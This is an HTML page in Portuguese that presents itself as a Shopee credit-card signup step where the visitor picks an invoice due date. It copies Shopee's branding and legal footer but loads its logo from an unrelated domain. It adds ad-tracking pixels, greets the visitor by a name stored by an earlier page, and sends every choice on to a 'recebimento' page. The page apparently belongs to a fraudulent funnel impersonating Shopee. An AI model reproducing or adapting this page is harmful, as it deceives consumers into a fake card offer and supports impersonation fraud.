﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Escolha do Vencimento</title>


    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->











    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Inter', sans-serif;
        }

        body {
            background-color: #f6f6f6;
            color: #1a1a1a;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            text-align: center;
            padding: 2rem;
            border-radius: 12px;
            margin: 40px auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .info-text {
            color: #4B5563;
            font-size: 1rem;
            text-align: left;
            margin-bottom: 1rem;
            padding: 0.5rem 0;
        }

        .welcome-text {
            color: #1F2937;
            font-size: 1.125rem;
            margin-bottom: 1.5rem;
        }

        .welcome-text strong {
            color: #EE4D2D;
        }

        .btn-custom {
            color: #1F2937;
            border: 1px solid #E5E7EB;
            width: 100%;
            background: white;
            font-weight: 500;
            border-radius: 8px;
            padding: 1rem;
            font-size: 1rem;
            margin-bottom: 0.75rem;
            cursor: pointer;
            transition: all 0.2s ease;
            text-align: center;
        }

        .btn-custom:hover {
            border-color: #EE4D2D;
            color: #EE4D2D;
            background: #FFF5F3;
            transform: translateY(-1px);
        }

        .btn-custom.primary {
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            color: white;
            border: none;
            border-radius: 50px;
            margin-top: 1rem;
        }

        .btn-custom.primary:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .vencimento-grid {
            display: grid;
            gap: 0.75rem;
            margin-top: 1rem;
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            padding: 2rem 1rem;
            border-bottom: solid 3px #EE4D2D;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem;
                padding: 1.5rem;
            }
        }
    </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">   
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div class="main-content">
            <div id="analise-secao" class="mb-3">
                <p class="info-text">Caso você realize o pagamento das faturas em dia, seu limite será aumentado constantemente.</p>
                <p class="info-text">No entanto, se houver atraso no pagamento das faturas, o limite poderá ser reduzido.</p>
                <button class="btn btn-custom primary" onclick="mostrarPagina('vencimento-secao')">
                    Concordo
                </button>
            </div>
    
            <div id="vencimento-secao" class="mb-3" style="display: none;">
                <p class="welcome-text">Ótimo <strong id="nomeCliente"></strong>! Agora escolha o vencimento da sua fatura:</p>
                <div class="vencimento-grid">
                    <button class="btn btn-custom">Dia 05</button>
                    <button class="btn btn-custom">Dia 10</button>
                    <button class="btn btn-custom">Dia 15</button>
                    <button class="btn btn-custom">Dia 25</button>
                    <button class="btn btn-custom">Dia 30</button>
                </div>
            </div>
        </div>
    </div>

    <div class="footer">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script>
    document.addEventListener("DOMContentLoaded", function() {
        const dadosUsuario = JSON.parse(localStorage.getItem('dadosUsuarioUni'));
        if (dadosUsuario && dadosUsuario.nome) {
            const primeiroNome = dadosUsuario.nome.split(' ')[0];
            document.getElementById('nomeCliente').textContent = primeiroNome;
        }
    });

    function mostrarPagina(paginaId) {
        document.getElementById('analise-secao').style.display = 'none';
        document.getElementById('vencimento-secao').style.display = 'none';
        document.getElementById(paginaId).style.display = 'block';
    }

    document.querySelectorAll('#vencimento-secao .btn').forEach(button => {
        button.addEventListener('click', function() {
            window.location.href = '../recebimento/index.php.html';
        });
    });
</script>

</body>
</html>